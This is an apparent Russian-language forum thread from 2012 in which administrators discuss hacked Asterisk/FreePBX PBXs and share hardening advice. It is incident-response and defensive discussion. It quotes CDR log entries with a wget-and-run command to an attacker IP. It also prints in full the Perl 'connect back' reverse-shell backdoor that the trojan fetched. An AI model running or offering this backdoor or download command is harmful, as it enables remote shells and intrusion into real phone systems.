вломали пару атс. версия астериска 1.8.7.0
в логах cdr вот такая фигня.
system (echo Fucked> /var/www/html/recordings/misc/x )
внимаение вопрос. как запустили команду system?
вот другой пример
рекомендую всем проверить сдр на предмет lastapp='system'. ибо в нормальной фрипбкс такого нету. mysql> select * from asteriskcdrdb.cdr where lastapp='system' -> ; +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | calldate | clid | src | dst | dcontext | channel | dstchannel | lastapp | lastdata | duration | billsec | disposition | amaflags | accountcode | uniqueid | userfield | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | 2012-04-06 02:20:11 | | | 98 | from-internal | Local/98@from-internal-a155;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 0 | 0 | ANSWERED | 3 | | 1333664411.20963 | | | 2012-04-07 23:31:34 | | | 98 | from-internal | Local/98@from-internal-1655;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 1 | 1 | ANSWERED | 3 | | 1333827094.22524 | | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ 2 rows in set (0.01 sec)
самое интересно что нет src вообще
Запустили через /var/www/html/recordings/misc/callme_page.php
.
Так что закрывайте доступ к этой директории.
sed -i 's/\(<?php\)/\1\nexit;/' /var/www/html/recordings/misc/callme_page.php
echo -e "Order allow,deny \nDeny from all" >> /var/www/html/recordings/.htaccess
а может не стоит выставлять в дикий нет, столько потенциально дырявого софта? делайте простенькие sbc, где доступны 3-4 порта (Os+asterisk\freeswith+fail2ban или pfsense+freeswitch)..
http://seclists.org/fulldisclosure/2012/Mar/234
Уязвимость найдена в FrePBX версий 2.6-2.10
Че-то тоскливо как-то становится, вторая уязвимость за месяц, позволяющая утащить все. Месяц назад выплыл баг в vTiger http://elastix.org/index.php/en/component/kunena/116-security/98468-vtiger-vulnerability.html.
Имхо, для всех коробок, хоть как-то смотрящих в инет надо в .htaccess добавлять что-то вроде:
AuthUserFile /var/www/.htpasswd
AuthType Basic
AuthName "Enter login and password"
Require valid-user
Order deny,allow
Deny from all
Allow from <trusted IP's>
Satisfy Any
иначе заклюют...
Возможно через Manager.
Покажите
netstat -nltup|grep asterisk
АТС как то связаны между собой?
Троянчик worsyn скачивает такую херь:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
собственно после чего, он может сделать всё что хошь.. такой радмин получается
залазим, к примеу, так: http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/
А полнее то строчка сдр какая? И нет ли на серваке wordpress ?
http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/ а вот и инструкция-пример как влезть
um2010 (Apr 8 '12)editВот рассказывал мне кто-то не так давно про разные системы обнаружения вторжений и fail2ban-ы... Если внешние коннекты к АТСке идут со статики - то я режу айпишники фаерволом, если таких много и откуда угодно - то ВПН и не морочить яйца. Есессно защиту от перебора паролей ВПНа никто не отменял, но так никто не увидит что у вас сип наружу торчит
А не пробовали объяснять что вываливание порта наружу чревато потерей бабок? Видимо поломали не в 1 действие, просто просканили грамотно. Клиент того же ППТП ВПН есть практически в любой системе, и айфонах, и на винде, и на линухах, везде. Настроить сервер пптп - 5 минут. Порезать айпишники - тоже несложно. А различные системы обнаружения спасают разве что в случае публичных веб и фтп серверов, когда пользователей огромное кол-во и они не авторизовываются. А вываливать порт астериски наружу и надеяться на то что атаку обнаружат - это как бороться с поносом, ограничивая доступ в сортир. Целенаправленный взлом в этом случае - вопрос времени. А если у вас ещё и веб-морда торчит наружу, то очень недолгого времени
asdev (Apr 13 '12)editчукча писатель? прочитай вот написано как поломали. в логах http сервера нет никаких подборов. у меня имеенно публичная сервер. еще и не мой а клиента. а еще у клиента КОРОБОЧКИ на динамических адресах. какое нафиг pptp? вообще возникакет впечатление что вы нкиогда с частными клиентами не работали.
meral (Apr 13 '12)editЯ писал про возможность подбора впн паролей. А просканить диапазон айпишников на предмет наличия какого-то дырявого пхп файла - нех делать, вы и не заметите этого, т.к. это и не скан вовсе, если сервер публичный и к веб-морде имеют доступ много народа. Коробочки на динамических адресах имеют прямой доступ в инет? Установка между коробочкой и каналом инета любого роутера за 20-30 уе уже позволит поднять впн канал, кроме того, многие коробочки умеют ПППоЕ, сервер которого тоже можно поднять. Если сервер публичный - что там ещё крутится? Или астериск у вас - публичный? С доступом всем?
asdev (Apr 13 '12)editА что за коробочки? Модели есть? В случае ВПН подключения пофигу какие у коробочек адреса, т.к. им назначаются адреса ВПН сети и сам сервер маршрутизирует на них траффик. Грубо говоря, если у вас на телефоне есть сип-звонилка и впн клиент, вы поехали в другую страну, подключились в ближайшем макдаке к вайфаю, и к впн серверу - у вас будет внутренний статический айпишник впн сети, который выдаётся сервером по вашему логину/паролю
asdev (Apr 13 '12)editЗадан: Apr 8 '12
Просмотрен: 3,400 раз
Обновлен: Apr 12 '12
Проект компании "АТС Дизайн"
Asterisk® и Digium® являются зарегистрированными торговыми марками компании
Digium, Inc., США.
IP АТС Asterisk распространяется под лицензией
GNU GPL.
А в логах-то что???
switch (Apr 8 '12)editда в том то и дело что ничего особенного. ну после взлома слив ттрафика на платные номера.
meral (Apr 8 '12)editСервер смотрел наружу сетевым интерфейсом?
switch (Apr 8 '12)editэпический вопрос, в духе: а сервер был включен в розетку?
um2010 (Apr 8 '12)editсервер был сам снаружи.
meral (Apr 8 '12)edit